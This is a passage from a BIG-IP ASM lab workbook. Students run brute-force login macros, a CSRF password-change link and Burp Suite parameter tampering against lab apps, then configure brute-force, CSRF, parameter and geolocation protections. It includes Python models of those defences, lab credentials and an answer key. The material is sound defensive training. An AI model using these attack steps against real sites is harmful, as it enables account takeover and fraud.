− Open the Virtual Server List page and examine hackazon_virtual.
This is the virtual server created by the TMSH command above. We’ll be protecting this virtual server against
brute force attacks in this exercise.
− Open the Security Policies > Policies List page and click Create.
− Use the following information for the new policy, and then click Save.
Policy Name hackazon_security_policy
Policy Template Rapid Deployment Policy
Virtual Server hackazon_virtual (HTTP)
Enforcement Mode Blocking
Policy Builder Learning Mode Automatic
Trusted IP Addresses 10.1.10.0 / 255.255.255.0 (Scroll right and click Add)

− Once the policy is created open the Learning and Blocking Settings page.
− Expand URLs, and then from the Learn New HTTP URLs list select Always.
− Click Save, then click Apply Policy.
− Open a new tab and click the Hack Login bookmark, and then close the tab.
− In the Configuration Utility open the Policies List page and click hackazon_security_policy.
(HINT: You can simply click on “Application Security”.)
− For Policy Building Learning Mode click Disabled, then click Save, and then click Apply Policy.
You used this process to learn about the /user/login URL, which you’ll need when configuring
a Login Page element for brute force protection.


Task 2 – Run a Brute Force Attack


Use iMacros for Firefox to launch a brute force attack against the web site.

− Open a new Firefox window, then click the iMacros button, and then in the iMacros pane right-click
on Exercises > brute single user.iim and select Edit Macro.
− Examine lines 1, 2, and 3.
You’re a malicious user, and you’ve identified that a user’s email address is [email protected]. All you need
to do is figure out their password. This macro attempts to log on to the /user/login page (line 1) using the
username [email protected] (line 2) with a series of different passwords (line 3, line 5, etc.).
− Click Cancel, and then click Play.
Eventually the brute force attacker successfully finds valid credentials.
− On the Hackazon My Account page click Profile.
You now have access to this user’s account details.

Notice that in the iMacros pane an error occurred on line 33.

The macro failed because it could no longer attempt to log in, as it was no longer on the /user/login page.
That means that we found the correct password right before line 33.
− Right-click on brute single user.iim and select Edit Macro, and then examine the entries right before line 33.

Question:
What is the correct password for [email protected]? ____________________________

This is an example of a brute force attack targeting a specific username.


− Click Cancel, and then in the Hackazon page click Logout, then click Sign In / Sign Up and attempt to log in
as test / test.
Notice that the login page URL is /user/login, and that the text “incorrect” displays after a failed login attempt.
You’ll need this information when creating a BIG-IP ASM Login Page.

− Right-click inside the username field and select Inspect Element.


The name value for this field is username. You’ll also need this when creating a BIG-IP ASM Login Page.
− Right-click inside the password field and select Inspect Element, then identify the name value for this field,
and then close the inspection window.
− In the Configuration Utility open the Security > Event Logs > Application > Requests page
(HINT: You can simply click on “Event Logs”.) and scroll through the entries in the log file.
There were several legal requests caused by the brute force attack against the /user/login page.
− Select the /user/login log entry directly before the /account log entry, and then click All Details.

− Identify the Username value.
BIG-IP ASM isn’t tracking the username of the logged in user. Also, notice that currently there is
no Login Result field on the All Details page.
− Select the Select all items checkbox, and then select Delete Requests > Delete all requests.

Task 3 – Create and Test a Login Page Element


Update hackazon_security_policy to identify successful and unsuccessful login requests.

− Navigate to Application Security > URLs, right-click Allowed URLs and select Open link in new tab, then in
the new tab, in the URL Contains field type /user/login, and then click Go.
This URL was added in task 1 when you built the security policy. You need the login page URL when creating
a Login Page, which BIG-IP ASM needs for brute force protection.
− Use this tab to open the Application Security > Sessions and Logins > Login Pages List page and click Create.
− For Login URL leave Explicit > HTTP selected, then click into the field and begin typing /user/login, and then select
it once it displays.

− Configure the login page using the following information, and then click Create.
Authentication Type HTML Form
Username Parameter Value username
Password Parameter Value password
A string that should NOT appear in the response incorrect
Expected HTTP response status code 302

− Click Apply Policy.


− In the Firefox Hackazon page click the Hack Login bookmark and attempt to log in
as [email protected] / hacked.
− Attempt to log in as [email protected] / P@ssw0rd!, and then click Logout.
− In the Configuration Utility reload the Application > Requests tab.
− Select the /user/login log entry directly before the /account log entry, and then use the All Details tab to identify
the Username value.

BIG-IP ASM now tracks the attempted username of these attacks.

− Identify the Login Result value.

BIG-IP ASM now identifies the login result because of the values you entered on the login page element.
− Select the previous /user/login log entry and identify the Login Result value.
Using the login page element, BIG-IP ASM can now identify successful and failed login attempts.
By identifying failed login attempts, BIG-IP ASM will be able to identify brute force attempts.

Task 4 – Add Brute Force Protection for Specific Usernames


Update hackazon_security_policy to identify and then block brute force attacks targeting a single username.

− Using the Login Pages List tab open the Application Security > Brute Force Attack Prevention page and
click Create.
− From the Login Page list select [HTTP]/user/login.
− In the Source-based Brute Force Protection section configure the following, and then click Create.
Username: Trigger: After 3 failed login attempts; Action: Alarm and CAPTCHA
Device ID, IP Address, Client Side Integrity Bypass Mitigation, CAPTCHA Bypass Mitigation: Never

− Click Apply Policy.


− In Firefox with brute single user.iim selected click Play.
After a few successful attack attempts, you’re presented with a CAPTCHA challenge.
− Enter the CAPTCHA challenge (which is case sensitive), and then click Play again.
You’re immediately presented with the CAPTCHA challenge.
− Open Internet Explorer and click the Hack Login bookmark, then attempt to log in
as [email protected] / brute, and then close the Internet Explorer window.
Even with a new browser session, the brute force attempt is immediately presented with a CAPTCHA challenge.
− In the Configuration Utility reload the Application > Requests tab.
− Select the Open Filter icon, then select the IP / Username / URL tab, then in the URL contains field
enter /user/login, and then click Apply Filter.
− Select an Illegal request log entry.

− Under Occurrences select 1, and then view the Enforcement Action Reason value.

This event log entry was generated when you entered a correct CAPTCHA challenge response. Notice that
the Username is included in the details window, and the threshold matches our setting of 3.

→NOTE: If you don’t have an event log entry with this value, you either didn’t successfully enter the CAPTCHA
challenge, or you didn’t enter the CAPTCHA challenge quickly enough.

− Select a Challenged request log entry, and then under Occurrences select 1.

This event log entry was generated when you didn’t attempt to enter a CAPTCHA challenge.
− In Firefox right-click on Exercises > brute multiple users.iim and select Edit Macro.
Now that you know that the user whose email is [email protected] has a password of P@ssw0rd!,
you will try to determine their personal username. This macro attempts to log on using different variations
of this user’s first, middle, and last name with the password of P@ssw0rd!.
− Click Cancel, and then click Play.
Once again, you’ve successfully gained access to the victim’s account, and you could use the line that the macro
failed on to identify the last username that was attempted to determine the correct username.

Question:
Why didn’t this brute force attack get blocked by the CAPTCHA challenge?

__________________________________________________________________

− Click Logout.

Task 5 – Add Brute Force Protection for Specific IP Addresses


Update hackazon_security_policy to identify and then block brute force attacks from a single source IP address.

− In the Configuration Utility, on the Brute Force Attack Protection tab click [HTTP]/user/login.
− For IP Address select the After option, and then enter 7 failed login attempts.
− From the Action list select Alarm and Blocking Page.
− Click Save, and then click Apply Policy.
− In Firefox with brute multiple users.iim selected click Play.
After a few successful attack attempts, you’re now blocked by BIG-IP ASM.

− Click Stop, and then click Play again. Repeat this two more times.
− Open Internet Explorer and click the Hack Login bookmark, and then attempt to log in
as [email protected] / P@ssw0rd!, and then close the blocked page.
Even when using valid credentials, all requests from this source IP address will be blocked for the length of
the Maximum Prevention Duration.

Question:
How long will this IP address be blocked? ______________________________

− In the Configuration Utility reload the Application > Requests tab.


− Select the most recent blocked log entry, and then under Occurrences click 1.
The Enforcement Action was Alarm and Blocking Page. Notice that the Client IP Address is included in the
details window.
− On the Brute Force Attack Protection tab click [HTTP]/user/login.
− For IP Address, from the Action list select Alarm and Drop, then click Save, then click Apply Policy, and then close
the second tab.
− In Firefox with brute multiple users.iim selected click Play.
After a few successful attack attempts, your connection is now reset.
− Close Firefox, then open Internet Explorer and click the Hack Login bookmark, and then attempt to log in
as [email protected] / abc123, and then close the Internet Explorer window.
Even with valid credentials, requests from this source IP address will be dropped for the length of
the Maximum Prevention Duration.
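As an added illustration of the Login Page element from Task 3 and the source-based thresholds of Tasks 4 and 5, the following Python model shows why the multiple-username macro passes the per-username CAPTCHA trigger but is caught by the per-IP trigger. It is example code written for this workbook, not part of BIG-IP ASM or the lab files; the account, usernames, client IP address and response bodies are constructed.

```python
"""
Constructed example (not F5's code): how the Login Page element classifies a
login attempt, and how the source-based thresholds from Tasks 4 and 5 (3 failures
per username -> CAPTCHA, 7 failures per IP -> block) react to a single-username
and a multiple-username brute force run. The credential store, usernames, client
address and response bodies are all made up for the example.
"""
from collections import defaultdict

LOGIN_URL = "/user/login"
FAILURE_STRING = "incorrect"   # "A string that should NOT appear in the response"
SUCCESS_STATUS = 302           # "Expected HTTP response status code"

# Constructed stand-in for the Hackazon backend: one valid account.
ACCOUNTS = {"victim@example.com": "P@ssw0rd!"}


def backend_login(username, password):
    """Return (status, body) the way the real login page would."""
    if ACCOUNTS.get(username) == password:
        return 302, ""                       # redirect to /account on success
    return 200, "Login or password incorrect"


def login_result(status, body):
    """Mirror the Login Page element: success needs the expected status code and
    must not contain the failure string; anything else counts as a failure."""
    if status == SUCCESS_STATUS and FAILURE_STRING not in body:
        return "success"
    return "failed"


class BruteForceProtection:
    """Source-based brute force protection for one login URL."""

    def __init__(self, username_threshold=3, username_action="captcha",
                 ip_threshold=None, ip_action="block"):
        self.username_threshold = username_threshold
        self.username_action = username_action
        self.ip_threshold = ip_threshold
        self.ip_action = ip_action
        self.failed_by_username = defaultdict(int)
        self.failed_by_ip = defaultdict(int)

    def handle(self, client_ip, username, password):
        """Process one POST to LOGIN_URL and return the outcome.

        Thresholds are checked before the credentials are forwarded, so once a
        source has crossed its limit even a correct password is not tried,
        which is what Task 5 shows when the IP address is blocked."""
        if self.ip_threshold and self.failed_by_ip[client_ip] >= self.ip_threshold:
            return self.ip_action
        if (self.username_threshold
                and self.failed_by_username[username] >= self.username_threshold):
            return self.username_action
        result = login_result(*backend_login(username, password))
        if result == "failed":
            self.failed_by_username[username] += 1
            self.failed_by_ip[client_ip] += 1
        return result


def run_attack(protection, client_ip, attempts):
    """Replay a list of (username, password) attempts from one client IP."""
    return [protection.handle(client_ip, user, pwd) for user, pwd in attempts]


# Constructed equivalents of the two iMacros runs.
SINGLE_USER = [("victim@example.com", p) for p in
               ("hacked", "brute", "letmein", "password", "P@ssw0rd!")]
MULTI_USER = [(u, "P@ssw0rd!") for u in
              ("jane", "jsmith", "jane.smith", "janes", "jsm", "smithj",
               "jane_smith", "victim@example.com")]

if __name__ == "__main__":
    # Username trigger only (Task 4): the single-user run hits CAPTCHA after 3
    # failures, but the multi-user run never trips it and logs in on attempt 8.
    print(run_attack(BruteForceProtection(), "10.1.10.50", SINGLE_USER))
    print(run_attack(BruteForceProtection(), "10.1.10.50", MULTI_USER))
    # Adding the IP trigger (Task 5) stops the multi-user run at attempt 8.
    print(run_attack(BruteForceProtection(ip_threshold=7), "10.1.10.50", MULTI_USER))
```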

PREPARE FOR NEXT EXERCISE


− In PuTTY, at the CLI copy and paste the following TMSH commands.
tmsh delete ltm virtual hackazon_virtual
tmsh delete ltm pool hackazon_pool
tmsh delete ltm node 10.1.20.20
tmsh delete ltm policy asm_auto_l7_policy__hackazon_virtual
tmsh delete asm policy hackazon_security_policy
exit

Question and Answer Key


Task 2 – Run a Brute Force Attack
Q: What is the correct password for [email protected]?
A: P@ssw0rd!

Task 4 – Add Brute Force Protection for Specific Usernames


Q: Why didn’t this brute force attack get blocked by the CAPTCHA challenge?
A: The brute force attack attempts weren’t using the same username.

Task 5 – Add Brute Force Protection for Specific IP Addresses


Q: How long will this IP address be blocked?
A: For the length of the Maximum Prevention Duration (60 minutes by default).


ASM Lesson 7 – CSRF Protection, Parameter Tampering Protection, and Geolocation Enforcement

NOTES



Exercise – Add CSRF and Parameter Tampering Protection, and Geolocation Enforcement
• Estimated completion time: 60 minutes.

Task 1 – Attempt a CSRF Attack on an Unprotected Web Site


Examine how a cross-site request forgery (CSRF) attack can be used to issue unauthorized commands from a user
that a web application trusts.

− If needed, re-open your RDP session to the Windows Jumpbox desktop.


− Open PuTTY and open the BIGIP_A saved session and log in as root / default.F5demo.com
− At the CLI copy and paste the following TMSH commands. (NOTE: Use the copy and paste guide inside
the Documents directory.)
tmsh create ltm pool dvwa_pool members add { 10.1.20.17:80 { address 10.1.20.17 } }
tmsh create ltm pool csrf_pool members add { 10.1.20.19:80 { address 10.1.20.19 } }
tmsh create ltm virtual dvwa_virtual destination 10.1.10.35:80 ip-protocol tcp profiles add { tcp { } http { } } security-log-profiles add { "Log all requests" } pool dvwa_pool
tmsh create ltm virtual csrf_virtual destination 10.1.10.135:80 pool csrf_pool

− Open Internet Explorer and click the CSRF bookmark.


You were just sent this link via a social networking web site. It looks like the same page you’re used to working
with; however, it has a link in the middle of the page for a special offer. Notice that the web page you’re on is
hosted on 10.1.10.135. This is a malicious web site, possibly hijacked by the hacker.
− Click the link in the middle of the page for the special offer.
You’re redirected to the DVWA login page. Notice that the page you’re now on is hosted on 10.1.10.35. This is the
legitimate web server.
− Close the page, then open Internet Explorer and click the DVWA bookmark, and then log in as admin / password
Now, let’s say you had opened the web application and logged in first, prior to viewing the link on the social
networking web site.
− On the left menu click CSRF.
This page can be used to allow web application users to change their password. Users should only be able to
change their password once they’ve successfully logged in.
− Click Home, and then scroll down to the bottom of the page.

You are logged in as admin.


− Open a second tab and click the CSRF bookmark.
Now, let’s say you opened the link from the social networking web site using a new tab.
− Scroll down to the bottom of the page.
Note that you aren’t logged in with any user credentials.

− Click the link in the middle of the page for the special offer.
Notice that you’re on the CSRF page on the actual web site (http://10.1.10.35/vulnerabilities/csrf) and the page
notifies you that your password has been changed.

− Scroll down to the bottom of the page.


You’re logged in as admin on this second tab. The CSRF attack exploited the trust the web application has
with the logged in user (in the first tab).
− In the first tab click Logout, and then attempt to log in again as admin / password
Your login credentials are no longer valid.
− In the second tab click the CSRF bookmark, then hover over the link, and at the bottom of the page examine what
the link does.

When the user clicks on this link it uses the /vulnerabilities/csrf page on the actual web site to change their
password to H@cker.
− Close the second tab.
− In the first tab log in as admin / H@cker, then from the left navigation menu click CSRF, and then change the
password back to password, then click Logout, and then close the Internet Explorer window.
To prevent this, you must add CSRF protection for the vulnerable URL, which is /vulnerabilities/csrf.

Task 2 – Configure CSRF Protection


Create a security policy for dvwa_virtual, and then add cross-site request forgery protection to the security policy.

− Open Chrome and click the BIGIP_A bookmark and log in as admin / admin.F5demo.com
− Open the Security Policies > Policies List page and click Create.
− Use the following information for the new policy, and then click Save.
Policy Name dvwa_security_policy
Policy Template Fundamental
Virtual Server dvwa_virtual (HTTP)
Application Language Unicode (utf-8)
Trusted IP Addresses 10.1.10.0 / 255.255.255.0 (Scroll right and click Add)

− Once the policy is created open the Application Security > CSRF Protection page.
− Select the CSRF Protection checkbox.

− Select the * checkbox, and then click Delete.

We’re removing the wildcard because we’re only concerned about the page users use to change their passwords
(the /vulnerabilities/csrf page).
− Change from Simple Edit Mode to Advanced Edit Mode.
− For the New URL, from the Method list select GET, and for URL copy and paste /vulnerabilities/csrf/, and then
click Add.

− Leave both Required Parameters and Enforcement Action set to the default values and click Save, and then
click Apply Policy.
− Open Internet Explorer and click the DVWA bookmark, and then log in as admin / password
− Open a second tab and click the CSRF bookmark, then click the link in the middle of the page for the
special offer, and then close the blocked tab.
The CSRF attempt is now blocked by BIG-IP ASM.
− In the Configuration Utility open the Security > Event Logs > Application > Requests page
(HINT: You can simply click on “Event Logs”.) and scroll through the entries in the log file.
− Select the blocked log entry, and then under Occurrences click 1.

Notice for Violation Reason it reads CSRF token absent.


− Click CSRF attack detected for more details about this attack type.

− In the DVWA page on the left navigation menu click CSRF, and then right-click in the Confirm new password field
and select Inspect element.

− In the inspection window examine the HTML code below the Change button.

You can see the cross-site request token (csrt) BIG-IP ASM injected into the page to protect it against
CSRF attacks.
− Close the Internet Explorer window.
− In the Configuration Utility open the Application Security > CSRF Protection page, then clear
the CSRF Protection checkbox, then click Save, and then click Apply Policy.
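The check that produced the "CSRF token absent" violation above, as an added Python model (not F5 or BIG-IP ASM code). The csrt value is modelled as a query/form parameter, the server key and session id are constructed, and treating /vulnerabilities/csrf and /vulnerabilities/csrf/ as the same protected URL is an assumption made here.

```python
"""Model of a CSRF token check (added example, not BIG-IP ASM code).

ASM injects a per-session token (csrt) into protected pages and raises the
"CSRF token absent" violation when a protected URL is requested without it.
The cross-site link from Task 1 carries no such token, so it is rejected, while
the same URL reached from the token-injected page is allowed.
"""
import hashlib
import hmac
import secrets
from urllib.parse import parse_qs, urlparse

# Constructed key; a real WAF keeps its own key material.
_SERVER_KEY = secrets.token_bytes(32)

# (method, URL) pairs placed under CSRF protection, as configured in Task 2.
PROTECTED_URLS = {("GET", "/vulnerabilities/csrf/")}


def _normalise(path: str) -> str:
    # Assumption made here: /vulnerabilities/csrf and /vulnerabilities/csrf/
    # are the same URL, since the attack link omits the trailing slash.
    return path.rstrip("/") + "/"


def issue_token(session_id: str) -> str:
    """Token bound to one session; only the holder of _SERVER_KEY can compute it."""
    return hmac.new(_SERVER_KEY, session_id.encode(), hashlib.sha256).hexdigest()


def inject_token(html: str, session_id: str) -> str:
    """Response side: add a hidden csrt field to every form in the page."""
    hidden = f'<input type="hidden" name="csrt" value="{issue_token(session_id)}">'
    return html.replace("</form>", hidden + "</form>")


def check_request(method: str, url: str, session_id: str) -> str:
    """Request side: return 'allow' or the violation reason shown in the event log."""
    parsed = urlparse(url)
    if (method.upper(), _normalise(parsed.path)) not in PROTECTED_URLS:
        return "allow"  # URL is not under CSRF protection
    tokens = parse_qs(parsed.query).get("csrt")
    if not tokens:
        return "CSRF token absent"
    if not hmac.compare_digest(tokens[0], issue_token(session_id)):
        return "CSRF token mismatch"
    return "allow"


if __name__ == "__main__":
    sid = "session-for-admin"  # constructed session id
    link_from_malicious_site = "http://10.1.10.35/vulnerabilities/csrf"
    print(check_request("GET", link_from_malicious_site, sid))  # CSRF token absent
    page = inject_token('<form action="/vulnerabilities/csrf/"></form>', sid)
    token = page.split('value="')[1].split('"')[0]
    print(check_request("GET", f"{link_from_malicious_site}/?csrt={token}", sid))  # allow
```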

Task 3 – Attempt a Parameter Tampering Attack


Use Burp Suite to change a parameter value between the web form and the web server.

− Open Start > Burp Suite, then in the update dialog box click Close, then click Next, and then click Start Burp.
− Select the Proxy tab, and then click Intercept is on (the button should now read Intercept is off).

− Open Firefox and click the Firefox options button and select Options.

− Click Advanced, and then for Connection click Settings.


− Select the Manual proxy configuration option, and then click OK.
− Click the DVWA bookmark, then log in as bobsmith / password, then click XSS stored and create an entry
named Order, and then copy and paste the following Review. DO NOT click Submit Review.
I would like to place an order for 1 new Dell laptop.

− In Burp Suite click Intercept is off (the button should now read Intercept is on).
− In the DVWA page click Submit Review.
− View the Burp Suite window (you may need to click Forward).
As a malicious user, you can now view and modify the entire HTTP request in Burp Suite before sending it to
the web server.

We’re going to simulate that the parameter named btnSign is actually a “price” parameter. This is an example of
a parameter that is defined on the web form but should NOT be modified. Imagine if this parameter value was
currently set to btnSign=1999.99 (the correct cost of the Dell laptop).
− Change the value of the btnSign parameter to btnSign=10.99, and then click Forward.

− View the result in the DVWA page.
The request was successfully sent to and returned by the web server.
− Examine the URL for this page, and then close the Firefox window.
You need to add parameter tampering protection for the /vulnerabilities/xss_s/ URL.
− In the Configuration Utility open the Event Logs > Application > Requests page.
− Select the newest (at the top) /vulnerabilities/xss_s/ log entry, and then view the body portion in
the Request section.

The value of the static btnSign parameter was successfully modified by the malicious user, and this modified
value was forwarded to the web server. The malicious user may have just purchased a new laptop for $10.99!
− In Burp Suite click Intercept is on (the button should now read Intercept is off).

Task 4 – Add Parameter Tampering Protection


Add parameter tampering protection for the btnSign field, and then attempt to modify the parameter value again
after submitting the web form.

− In the Configuration Utility open the Learning and Blocking Settings page.
− Expand Parameters, and then from the Learn New Parameters list select Always.
− Collapse Parameters, then expand URLs, and then from the Learn New HTTP URLs list select Always.
− Click Save, and then click Apply Policy.
− Open a New private window (Firefox) and click the iMacros button, and then in the iMacros pane
select Exercises > csrf build.iim and click Play (Loop). Wait for the macro to finish before moving on.
− In the Configuration Utility open the Policies List page and click dvwa_security_policy.
(HINT: You can simply click on “Application Security”.)
− For Policy Building Learning Mode click Disabled, and then click Save.
− Open the Parameters List page and click btnSign.
This is the parameter that was exploited by the parameter tampering attack.
− Clear the Perform Staging checkbox.
− From the Parameter Value Type list select Dynamic content value, and then click Update.
You’re prompted to define extractions. An extraction is the exact URL where this parameter value is defined.
− Click OK.
− On the Parameter > Extractions page select the File Types checkbox, then select no_ext from the list,
and then click Add.
Remember that we need to protect the /vulnerabilities/xss_s/ URL. There is no file type associated with this
URL, so you’ll use the no_ext file type.

− Select the URLs checkbox, then select HTTP from the list, then select /vulnerabilities/xss_s/ from the list, and then
click Add.

− Click Create, and then on the Parameter Properties page click Update.
− Open the Learning and Blocking Settings page, and then expand Parameters.
− For the Illegal dynamic parameter value violation select the Alarm and Block checkboxes, then click Save,
and then click Apply Policy.

− In Firefox log in as bobsmith / password, then click XSS stored and create an entry
named Order, and then copy and paste the following Review. DO NOT click Submit Review.
I would like to place an order for 1 new Dell laptop.

− In Burp Suite click Intercept is off (the button should now read Intercept is on).
− In the DVWA page click Submit Review.
− In Burp Suite change the value of the btnSign parameter to btnSign=10.99, and then click Forward.
− View the result in the DVWA page.
The parameter tampering attempt is now blocked by BIG-IP ASM.
− Close Burp Suite.
− In the Configuration Utility open the Event Logs > Application > Requests page, then select the newest blocked
log entry, and then examine the Violation that caused BIG-IP ASM to block it.
− In the Attack Type row, click the triangle after Parameter Tampering for more details about this attack.

− In Firefox click the Firefox options button and select Options.


− Click Advanced, then for Connection click Settings, then select the No proxy option, then click OK, and then
close the Options tab.
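What the "Dynamic content value" setting with an extraction does, as an added Python model (not F5 or BIG-IP ASM code). The form HTML, the 1999.99 price (the real DVWA button value is not a price) and the session ids are constructed, and the attribute order in the HTML is an assumption of the regex.

```python
"""Model of a "Dynamic content value" parameter check (added example, not BIG-IP ASM code).

In Task 4, btnSign is a dynamic content value parameter with an extraction from
/vulnerabilities/xss_s/: the WAF records the value the server actually sends in
that page and raises "Illegal dynamic parameter value" when a later request
carries a value it never served to that session.
"""
import re
from collections import defaultdict
from urllib.parse import parse_qs

# Parameter name -> URLs its legitimate values are extracted from (Task 4 settings).
DYNAMIC_PARAMS = {"btnSign": {"/vulnerabilities/xss_s/"}}

# Constructed response body, standing in for the page served by the dvwa_pool member.
SERVED_FORM = """
<form method="post" action="/vulnerabilities/xss_s/">
  <input type="text" name="txtName">
  <input type="submit" name="btnSign" value="1999.99">
</form>
"""

# Assumes name="..." precedes value="..." inside the tag, as in SERVED_FORM.
_INPUT_RE = re.compile(r'<input[^>]*\bname="([^"]+)"[^>]*\bvalue="([^"]*)"', re.I)


class DynamicValueStore:
    """Values served per (session, parameter); a WAF keeps these in its session table."""

    def __init__(self) -> None:
        self._seen = defaultdict(set)

    def extract(self, session_id: str, url: str, html: str) -> None:
        """Response side: record dynamic parameter values served from an extraction URL."""
        for name, value in _INPUT_RE.findall(html):
            if url in DYNAMIC_PARAMS.get(name, ()):
                self._seen[(session_id, name)].add(value)

    def check(self, session_id: str, body: str) -> str:
        """Request side: return 'allow' or the violation the lab sets to Alarm and Block."""
        for name, values in parse_qs(body, keep_blank_values=True).items():
            if name not in DYNAMIC_PARAMS:
                continue  # user-input and static parameters are checked elsewhere
            served = self._seen.get((session_id, name), set())
            if any(v not in served for v in values):
                return "Illegal dynamic parameter value"
        return "allow"


if __name__ == "__main__":
    store = DynamicValueStore()
    store.extract("bobsmith-session", "/vulnerabilities/xss_s/", SERVED_FORM)
    print(store.check("bobsmith-session", "txtName=Order&btnSign=1999.99"))  # allow
    print(store.check("bobsmith-session", "txtName=Order&btnSign=10.99"))    # Illegal dynamic parameter value
```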


Task 5 – Examine Requests from Specific Regions


Use an iRule to simulate requests coming from several key regions, and then examine the event log to view where
requests are coming from.

− In the Configuration Utility open the Virtual Server List page and click dvwa_virtual, and then open
the Resources page.
− For iRules click Manage, then add the worldwide_ip_addresses iRule, and then click Finished.
This iRule simulates requests coming from some very specific geolocations.
− Open the Policies List page and click dvwa_security_policy.
− Under the Advanced settings, for Trust XFF Header select the Enabled button, then click Save, and then
click Apply Policy.
This setting will enable BIG-IP ASM to use the X-Forwarded-For value (from the iRule) as the IP address of each
incoming request.
− In Firefox, in the iMacros pane select Exercises > login requests.iim, then in the Max field type 2000,
and then click Play (Loop).
This macro simulates requests to the DVWA login page.
− While the macro is running, in the Configuration Utility open the Event Logs > Application > Requests page.
− Examine the IP addresses of different log entries.
− Mouse over the flag icons of different log entries.

− Select a log entry from the United States.


− In the middle pane click the filter icon next to United States.

− Select Add geolocation to filter.


You can quickly view all requests from a specific country.
− Near the top of the page click the Open Filter icon.

− For Geolocation, edit the value to China, then click Apply Filter, and then examine the results.


Task 6 – Block Malicious Requests from Specific Geolocations


Identify malicious requests from the North Korea geolocation, and then block all requests from that geolocation.
Then block all requests from Syria.

− In Firefox, in the iMacros pane click Stop.


− Select malicious logins.iim and click Play (Loop).
This macro simulates different SQL injection attempts to the DVWA login page.
− While the macro is running, in the Configuration Utility reload the Event Logs > Application > Requests page.
− Select one of the log entries from Korea, Democratic People's Republic of.

− Click the filter icon before Korea, Democratic People's Republic of and select Add geolocation to filter.

− Select one of the /login.php log entries with a violation rating of 4 or 5.

− Click the filter icon after Violation Rating > 5 (or Violation Rating > 4), and then
select Add violation rating to filter.

Notice that this adds the new filter criterion to the previous filter criteria.
− Select any of the log entries and for the Attack signature detected violation, under Occurrences click the number.
You’ve identified that you’re getting several of these malicious SQL injection attempts from
the North Korea geolocation.
− Select the triangle icon after Geolocation.

− Click Disallow Geolocation.


Notice that you’re informed you need to apply the policy.
− Navigate to Security > Application Security and right-click on Geolocation Enforcement and
select Open link in new tab, and then examine the new tab.
The Korea, Democratic People's Republic of geolocation has been added to the Disallowed Geolocation list.
− Click Apply Policy, and then quickly examine the Firefox window with the macro running.
After a couple of requests from other countries, a malicious SQL injection request from North Korea is blocked.
− In the iMacros pane select login requests.iim and click Play (Loop).
While most requests are allowed, many requests are being blocked.
− While the macro is running, in the Configuration Utility reload the Application > Requests tab.
− Click the filter icon.

− For Request Status select Blocked, and then click Apply Filter.
There are now several blocked log entries from North Korea.
− Select one of the blocked log entries and under Occurrences click 1.

− On the Geolocation Enforcement tab click inside the Allowed Geolocations list and begin typing syria, then
select Syrian Arab Republic, and then click <<.

− Click Save, then click Apply Policy, and then close the second tab.
− On the Application > Requests tab click the refresh icon.

This reloads the page with the current filter. There are now requests being blocked from two geolocations.
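How the Trust XFF Header choice from Task 5 decides which address is geolocated, and how the Disallowed Geolocations list from Task 6 is then applied, as an added Python model (not F5, BIG-IP ASM or iRule code). The country table and all addresses are constructed, and the trusted_proxies argument is a hardening added here, not an ASM setting.

```python
"""Which address gets geolocated, and what a disallowed-geolocation list does
(added example, not BIG-IP ASM or iRule code).

Task 5 enables Trust XFF Header so that the X-Forwarded-For value written by the
worldwide_ip_addresses iRule is treated as the client address. The same setting
would honour an X-Forwarded-For header that an arbitrary client inserted itself,
so this model only honours the header when the connection arrives from a known
proxy. Header names are assumed to be already canonicalised.
"""
import ipaddress

# Constructed prefix -> country table standing in for the geolocation database.
GEO_TABLE = {
    "203.0.113.0/24": "United States",
    "198.51.100.0/24": "China",
    "192.0.2.0/25": "Korea, Democratic People's Republic of",
    "192.0.2.128/25": "Syrian Arab Republic",
}


def lookup_country(ip: str) -> str:
    """Return the country name the event log would show, or 'N/A' if unknown."""
    addr = ipaddress.ip_address(ip)
    for prefix, country in GEO_TABLE.items():
        if addr in ipaddress.ip_network(prefix):
            return country
    return "N/A"


def effective_client_ip(src_ip, headers, trust_xff, trusted_proxies=()):
    """Pick the address the policy geolocates.

    trust_xff off: the TCP source address, whatever the headers say.
    trust_xff on:  the first X-Forwarded-For hop (which hop to believe is a
                   modelling choice), but only if the TCP source is one of
                   trusted_proxies; an empty tuple means trust any source,
                   which is the exposure the lab's iRule demonstrates.
    """
    xff = headers.get("X-Forwarded-For")
    if not trust_xff or not xff:
        return src_ip
    if trusted_proxies and src_ip not in trusted_proxies:
        return src_ip
    return xff.split(",")[0].strip()


def enforce(src_ip, headers, disallowed, trust_xff=True, trusted_proxies=()):
    """Apply the Disallowed Geolocations list and return an event-log style record."""
    ip = effective_client_ip(src_ip, headers, trust_xff, trusted_proxies)
    country = lookup_country(ip)
    status = "Blocked" if country in disallowed else "Allowed"
    return {"ip": ip, "geolocation": country, "request_status": status}


if __name__ == "__main__":
    # Constructed: 10.1.10.50 stands in for the only source allowed to set XFF.
    disallowed = {"Korea, Democratic People's Republic of", "Syrian Arab Republic"}
    hdr = {"X-Forwarded-For": "192.0.2.10"}
    print(enforce("10.1.10.50", hdr, disallowed, trusted_proxies={"10.1.10.50"}))
    print(enforce("10.1.10.50", hdr, disallowed, trust_xff=False))
```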

Task 7 – View the Security Charts


View the built-in BIG-IP ASM security charts.

− Open the Security > Reporting > Application > Charts page
(HINT: You can simply click on “Reporting”.)

NOTE: It will take up to five minutes for the recent transaction data to load. Perhaps use this time to use the
restroom or get a beverage.

− From the Time Period list select Last Hour, and from the Chart type list select Stacked.
− From the View By list select Client Countries.
We can see the origin of all requests this past hour.
− From the View By list select Request Types, then in the Details section click Blocked, and then from
the View By list select Violations.
We can see the reason for all blocked requests.
− From the View By list select Client Countries.
We can see the origin of all blocked requests.

PREPARE FOR NEXT EXERCISE


− In Firefox, in the iMacros pane click Stop, and then close the Firefox window.
− In PuTTY, at the CLI copy and paste the following TMSH commands.
tmsh delete ltm virtual csrf_virtual
tmsh delete ltm pool csrf_pool
tmsh delete ltm node 10.1.20.19
tmsh delete ltm virtual dvwa_virtual
tmsh delete ltm pool dvwa_pool
tmsh delete ltm node 10.1.20.17
tmsh delete ltm policy asm_auto_l7_policy__dvwa_virtual
tmsh delete asm policy dvwa_security_policy
exit


ASM Lesson 8 – Data Guard and PCI Compliance



Exercise – Use Data Guard and Attain PCI Compliance


• Estimated completion time: 45 minutes.

Task 1 – View the PCI Compliance Report


Create a security policy for dvwa_virtual, and then examine and update the PCI Compliance report.

− If needed, re-open your RDP session to the Windows Jumpbox desktop.


− Open PuTTY and open the BIGIP_A saved session and log in as root / default.F5demo.com
− At the CLI copy and paste the following TMSH commands. (NOTE: Use the copy and paste guide inside
the Documents directory.)
tmsh create ltm pool dvwa_pool members add { 10.1.20.17:80 { address 10.1.20.17 } }
